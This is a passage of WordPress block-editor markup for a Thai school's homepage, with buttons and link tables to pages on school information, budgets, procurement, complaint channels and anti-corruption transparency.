,\"height\":600}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 